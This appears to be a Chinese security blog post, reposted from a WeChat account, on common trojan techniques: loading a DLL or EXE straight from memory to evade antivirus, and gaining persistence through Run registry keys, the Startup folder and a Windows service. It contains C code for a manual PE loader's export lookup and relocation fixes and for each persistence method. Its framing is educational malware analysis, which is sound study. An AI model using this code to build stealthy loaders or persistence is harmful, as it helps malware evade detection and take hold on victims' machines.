介绍
DLL和 exe从内存中直接加载到病毒木马的内存中执行,不需要 LoadLibrary等现成的 API函数去操作,以此躲过杀毒软件的拦截检测。直接加载内存运行
DLL或者 EXE等文件直接从内存加载到病毒木马的内存中执行,不需要通过 LoadLibrary等现成的 API中去操作,以此躲过杀毒软件的拦截检测。DLL文件,内存加载运行技术可以把这些 DLL作为资源直接插入到自己的程序中,直接在内存中加载运行即可,不需要将 DLL释放到本地。内存直接加载运行技术需要对PE文件结构有较深的认识,明白PE格式中的导入、导出和重定位表的具体操作过程。PE加载器模拟PE文件的加载过程的核心就是对导入、导出和重定位表的操作过程。-
实现流程
-
在
DLL文件中,根据PE结构获取其加载映像的大小SizeofImage,并根据SizeOfImage在自己的程序中申请可读、可写、可执行的内存,那么这块内存的首地址就是DLL的加载基址 -
根据
DLL中的PE结构获取其映像对齐大小SectionAlignment,然后把DLL文件数据按照SectionAlignment复制到上述申请的可读、可写、可执行的内存中 -
根据PE结构的重定位表,重新对重定位进行修正
-
根据PE结构的导入表,加载所需的
DLL,并获取导入函数的地址并写入导入表中,修改DLL加载基址ImageBase -
根据PE结构获取
DLL的入口地址,然后构造并调用DllMain函数,实现DLL加载。
EXE文件时,不需要构造 DllMain函数,而是根据PE结构获取 EXE的入口地址偏移 AddressOfEntryPoint并计算出入口地址,然后直接跳转到入口地址执行即可,而且对于 EXE文件来说重定位表并不是必须的,即使没有重定位表, EXE也可以正常运行。因为对于 EXE进程来说,进程最早加载的模块是 EXE模块,所以它可以按照默认的加载基址加载到内存。对于没有重定位表的程序,只能把它加载到默认的加载基址上,如果默认加载基址已被占用,则直接内存加载运行会失败。-
关键实现
// 模拟GetProcAddress获取内存DLL的导出函数LPVOID MyGetProcAddress(LPVOID lpBaseAddress, PCHAR lpszFuncName){LPVOID lpFunc = NULL;// 获取导出表PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)lpBaseAddress;PIMAGE_NT_HEADERS pNtHeaders = (PIMAGE_NT_HEADERS)((ULONG32)pDosHeader + pDosHeader->e_lfanew);PIMAGE_EXPORT_DIRECTORY pExportTable = (PIMAGE_EXPORT_DIRECTORY)((DWORD)pDosHeader + pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);// 获取导出表的数据PDWORD lpAddressOfNamesArray = (PDWORD)((DWORD)pDosHeader + pExportTable->AddressOfNames);PCHAR lpFuncName = NULL;PWORD lpAddressOfNameOrdinalsArray = (PWORD)((DWORD)pDosHeader + pExportTable->AddressOfNameOrdinals);WORD wHint = 0;PDWORD lpAddressOfFunctionsArray = (PDWORD)((DWORD)pDosHeader + pExportTable->AddressOfFunctions);DWORD dwNumberOfNames = pExportTable->NumberOfNames;DWORD i = 0;// 遍历导出表的导出函数的名称, 并进行匹配for (i = 0; i < dwNumberOfNames; i++){lpFuncName = (PCHAR)((DWORD)pDosHeader + lpAddressOfNamesArray[i]);if (0 == ::lstrcmpi(lpFuncName, lpszFuncName)){// 获取导出函数地址wHint = lpAddressOfNameOrdinalsArray[i];lpFunc = (LPVOID)((DWORD)pDosHeader + lpAddressOfFunctionsArray[wHint]);break;}}return lpFunc;}// 修改PE文件重定位表信息BOOL DoRelocationTable(LPVOID lpBaseAddress){// 重定位表的结构:// DWORD sectionAddress, DWORD size (包括本节需要重定位的数据)//注意重定位表的位置可能和硬盘文件中的偏移地址不同,应该使用加载后的地址PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)lpBaseAddress;PIMAGE_NT_HEADERS pNtHeaders = (PIMAGE_NT_HEADERS)((ULONG32)pDosHeader + pDosHeader->e_lfanew);PIMAGE_BASE_RELOCATION pLoc = (PIMAGE_BASE_RELOCATION)((unsigned long)pDosHeader + pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress);// 判断是否有 重定位表if ((PVOID)pLoc == (PVOID)pDosHeader){// 重定位表 为空return TRUE;}while ((pLoc->VirtualAddress + pLoc->SizeOfBlock) != 0) //开始扫描重定位表{WORD *pLocData = (WORD *)((PBYTE)pLoc + sizeof(IMAGE_BASE_RELOCATION));//计算本节需要修正的重定位地址的数目int nNumberOfReloc = (pLoc->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(WORD);for (int i = 0; i < nNumberOfReloc; i++){if ((DWORD)(pLocData[i] & 0x0000F000) == 0x00003000) //这是一个需要修正的地址{// 32位dll重定位,IMAGE_REL_BASED_HIGHLOW// 对于x86的可执行文件,所有的基址重定位都是IMAGE_REL_BASED_HIGHLOW类型的。DWORD* pAddress = (DWORD *)((PBYTE)pDosHeader + pLoc->VirtualAddress + (pLocData[i] & 0x0FFF));DWORD dwDelta = (DWORD)pDosHeader - pNtHeaders->OptionalHeader.ImageBase;*pAddress += dwDelta;}}//转移到下一个节进行处理pLoc = (PIMAGE_BASE_RELOCATION)((PBYTE)pLoc + pLoc->SizeOfBlock);}return TRUE;}
设置自启动
注册表
注册表相当于操作系统的数据库,记录着系统中方方面面的数据,其中也不 乏直接或者间接导致开机自启动的数据。下面是Run注册表中添加程序路径 的方式,实现开机自启。
-
关键函数
WINADVAPI LSTATUSAPIENTRYRegOpenKeyExW(_In_ HKEY hKey, // 当前打开或者预定义的键_In_opt_ LPCWSTR lpSubKey, // 指向一个非中断字符串将要打开键的名称_In_opt_ DWORD ulOptions, // 保留,必须设置为 0_In_ REGSAM samDesired, // 对指定键希望得到的访问权限进行的访问标记_Out_ PHKEY phkResult // 指向一个变量的指针,该变量保存打开注册表的句柄);WINADVAPI LSTATUSAPIENTRYRegSetValueExW(_In_ HKEY hKey, // 指定一个已打开项的句柄,或者一个标准项名_In_opt_ LPCWSTR lpValueName, // 指向一个字符串的指针,该字符串包含了欲设置值的名称_Reserved_ DWORD Reserved, // 保留值,必须强制为 0_In_ DWORD dwType, // 指定将存储的数据类型_In_reads_bytes_opt_(cbData) CONST BYTE* lpData,// 指向一个缓冲区,该缓冲区包含了为指定名称存储的数据_In_ DWORD cbData // 指定由lpData参数所指向的数据大小,单位是字节);
-
实现思路
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunHKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun
另外在修改注册表的权限问题上,在编程实现上,
要修改 HKEY_LOCAL_MACHINE主键的注册表要求程序具有管理员的权限。
而修改 HKEY_CURRENT_USER主键的注册表,只需要用户默认权限就可以实现。
BOOL RegCurrentUser(char *lpFileName, char *lpValueName){// 默认权限HKEY hKey;// 打开注册表键RegOpenKeyEx(HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Run", 0, KEY_WRITE, &hKey)// 修改注册表值,实现开机自启RegSetValueEx(hKey, lpszValueName, 0, REG_SZ, (BYTE *)lpszFileName, (1 + lstrlen(lpszFileName)))// 关闭注册表键RegCloseKey(hKey);return TRUE;}// 需管理员权限的路径BOOL RegLocalMachine(char *lpFileName, char *lpValueName){// 管理员权限HKEY hKey;// 打开注册表键RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Run", 0, KEY_WRITE, &hKey)// 修改注册表值,实现开机自启RegSetValueEx(hKey, lpszValueName, 0, REG_SZ, (BYTE *)lpszFileName, (1 + lstrlen(lpszFileName)))// 关闭注册表键RegCloseKey(hKey);return TRUE;}
快速启动目录
-
函数介绍
BOOL SHGetSpecialFolderPathA(HWND hwnd, // 窗口所有者的句柄LPSTR pszPath, // 返回路径的缓冲区int csidl, // 系统路径的CSIDL标识BOOL fCreate // 指示文件夹是否要创建,false不创建 true创建);
-
实现原理
Windows系统有自带的快速启动的文件夹,他是最为简单的自启动方式,只要把程序放入到这个快速启动文件夹中,系统在启动时就会自动地加载并运行相应的程序,实现开机自启动功能。
快速启动目录并不是一个固定地目录,每台计算机地目录都不相同,但是可以使用 SHGetSpecialFolderPath函数获取Windows系统中快速启动目录地路径,快速启动目录的 CSIDL标识值为 CSIDL_STARTUP。
BOOL AutoRun_Startup(char *lpszSrcFilePath, char *lpszDestFileName){ BOOL bRet = FALSE; char szStartupPath[MAX_PATH] = {0}; char szDestFilePath[MAX_PATH] = {0}; // 获取 快速启动目录 路径 bRet = SHGetSpecialFolderPath(NULL, szStartupPath, CSIDL_STARTUP, TRUE); printf("szStartupPath=%sn", szStartupPath); if (FALSE == bRet) { return FALSE; } // 构造拷贝的 目的文件路径 wsprintf(szDestFilePath, "%s\%s", szStartupPath, lpszDestFileName); // 拷贝文件到快速启动目录下 bRet = CopyFile(lpszSrcFilePath, szDestFilePath, FALSE); if (FALSE == bRet) { return FALSE; } return TRUE;}系统服务
-
函数介绍
WINADVAPI SC_HANDLE// 建立一个到服务控制管理器的连接,并打开指定的数据库WINAPI OpenSCManagerW(_In_opt_ LPCWSTR lpMachineName,//指向零终止字符串,指定目标计算机的名称_In_opt_ LPCWSTR lpDatabaseName,//指向零终止字符串,指定将要打开的服务控制管理数据库的名称 SERVICES_ACTIVE_DATABASE_In_ DWORD dwDesiredAccess// 指向服务访问控制管理器的权限);WINADVAPI SC_HANDLE// 创建一个服务对象,并将其添加到指定的服务控制管理器数据库中WINAPI CreateServiceW(_In_ SC_HANDLE hSCManager, // 指向服务控制管理器数据库的句柄_In_ LPCWSTR lpServiceName, // 要安装服务的名称_In_opt_ LPCWSTR lpDisplayName, // 用户界面用来识别服务的显示名称_In_ DWORD dwDesiredAccess, // 对服务的访问_In_ DWORD dwServiceType, // 服务类型_In_ DWORD dwStartType, // 服务启动项_In_ DWORD dwErrorControl,// 当该服务启动失败时,指定产生错误严重程度以及应采取的保护措施_In_opt_ LPCWSTR lpBinaryPathName,// 服务程序的二进制文件,它完全限定路径。如果路径中包含空格,则必须引用它,以便能正确地解析_In_opt_ LPCWSTR lpLoadOrderGroup, // 指向加载排序组的名称_Out_opt_ LPDWORD lpdwTagId, // 指定的组中唯一的标记值变量_In_opt_ LPCWSTR lpDependencies,// 空分隔名称的服务或加载顺序组系统在这个服务开始之前的双空终止数组的指针_In_opt_ LPCWSTR lpServiceStartName, // 该服务应运行的账户名称_In_opt_ LPCWSTR lpPassword // 由lpServiceStartName参数指定的账户名的密码);WINADVAPI SC_HANDLE// 打开一个已经存在的服务WINAPI OpenServiceW(_In_ SC_HANDLE hSCManager, // 指向SCM数据库句柄_In_ LPCWSTR lpServiceName, // 要打开服务的名字_In_ DWORD dwDesiredAccess // 指定服务权限);WINADVAPI BOOL// 启动服务WINAPI StartServiceW(_In_ SC_HANDLE hService,// OpenService或者CreateService函数返回的服务句柄,需要有SERVICE_START_In_ DWORD dwNumServiceArgs,// 下一个形参的字符串个数_In_reads_opt_(dwNumServiceArgs)LPCWSTR *lpServiceArgVectors// 传递给服务ServiceMain的参数,如果没有可以为NULL);WINADVAPI BOOL// 将服务进程的主线程连接到服务控制管理器,该线程将作为调用过程的服务控制分派器线程WINAPI StartServiceCtrlDispatcherW(_In_ CONST SERVICE_TABLE_ENTRYW *lpServiceStartTable// 指向SERVICE_TABLE_ENTRY结构的指针,其中包含可在调用进程中执行的每个服务的条目);
-
实现思路
通过 OpenSCManager函数打开服务控制管理器数据库并获取数据库的句 柄
WINADVAPI SC_HANDLE// 建立一个到服务控制管理器的连接,并打开指定的数据库WINAPI OpenSCManagerW(_In_opt_ LPCWSTR lpMachineName,//指向零终止字符串,指定目标计算机的名称_In_opt_ LPCWSTR lpDatabaseName,//指向零终止字符串,指定将要打开的服务控制管理数据库的名称 SERVICES_ACTIVE_DATABASE_In_ DWORD dwDesiredAccess// 指向服务访问控制管理器的权限);WINADVAPI SC_HANDLE// 创建一个服务对象,并将其添加到指定的服务控制管理器数据库中WINAPI CreateServiceW(_In_ SC_HANDLE hSCManager, // 指向服务控制管理器数据库的句柄_In_ LPCWSTR lpServiceName, // 要安装服务的名称_In_opt_ LPCWSTR lpDisplayName, // 用户界面用来识别服务的显示名称_In_ DWORD dwDesiredAccess, // 对服务的访问_In_ DWORD dwServiceType, // 服务类型_In_ DWORD dwStartType, // 服务启动项_In_ DWORD dwErrorControl,// 当该服务启动失败时,指定产生错误严重程度以及应采取的保护措施_In_opt_ LPCWSTR lpBinaryPathName,// 服务程序的二进制文件,它完全限定路径。如果路径中包含空格,则必须引用它,以便能正确地解析_In_opt_ LPCWSTR lpLoadOrderGroup, // 指向加载排序组的名称_Out_opt_ LPDWORD lpdwTagId, // 指定的组中唯一的标记值变量_In_opt_ LPCWSTR lpDependencies,// 空分隔名称的服务或加载顺序组系统在这个服务开始之前的双空终止数组的指针_In_opt_ LPCWSTR lpServiceStartName, // 该服务应运行的账户名称_In_opt_ LPCWSTR lpPassword // 由lpServiceStartName参数指定的账户名的密码);WINADVAPI SC_HANDLE// 打开一个已经存在的服务WINAPI OpenServiceW(_In_ SC_HANDLE hSCManager, // 指向SCM数据库句柄_In_ LPCWSTR lpServiceName, // 要打开服务的名字_In_ DWORD dwDesiredAccess // 指定服务权限);WINADVAPI BOOL// 启动服务WINAPI StartServiceW(_In_ SC_HANDLE hService,// OpenService或者CreateService函数返回的服务句柄,需要有SERVICE_START_In_ DWORD dwNumServiceArgs,// 下一个形参的字符串个数_In_reads_opt_(dwNumServiceArgs)LPCWSTR *lpServiceArgVectors// 传递给服务ServiceMain的参数,如果没有可以为NULL);WINADVAPI BOOL// 将服务进程的主线程连接到服务控制管理器,该线程将作为调用过程的服务控制分派器线程WINAPI StartServiceCtrlDispatcherW(_In_ CONST SERVICE_TABLE_ENTRYW *lpServiceStartTable// 指向SERVICE_TABLE_ENTRY结构的指针,其中包含可在调用进程中执行的每个服务的条目);
系统服务程序的编写
自启动服务程序并不是普通的程序,而是要求程序创建服务入口点函数,否则,不能创建系统服务。
调用系统函数 StartServiceCtrlDispatcher将程序的主线程连接到服务控制管理程序,服务控制管理程序启动服务后,等待服务控制主函数调用 StartServiceCtrlDispatcher函数,如果没有调用该函数时设置服务入口点,则会报错。
服务程序 ServiceMain入口函数的代码
void __stdcall ServiceMain(DWORD dwArgc, char *lpszArgv){g_ServiceStatusHandle = RegisterServiceCtrlHandler(g_szServiceName, ServiceCtrlHandle);TellSCM(SERVICE_START_PENDING, 0, 1);TellSCM(SERVICE_RUNNING, 0, 0);while (TRUE){Sleep(5000);DoTask();}}
总结
关于自启动技术最常见的是第一种注册表,下面的相比于第一种有的适用行不是很强,或者编写比较麻烦。这种技术也是杀软重点监测的技术,对于杀软来说,只要守住“入口”,就可以将病毒木马挡在门外了,下一篇会继续探索一下隐藏技术,学习一点简单的免杀。
本文始发于微信公众号(Khan安全攻防实验室):恶意代码分析系列-几种常用技术(3)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论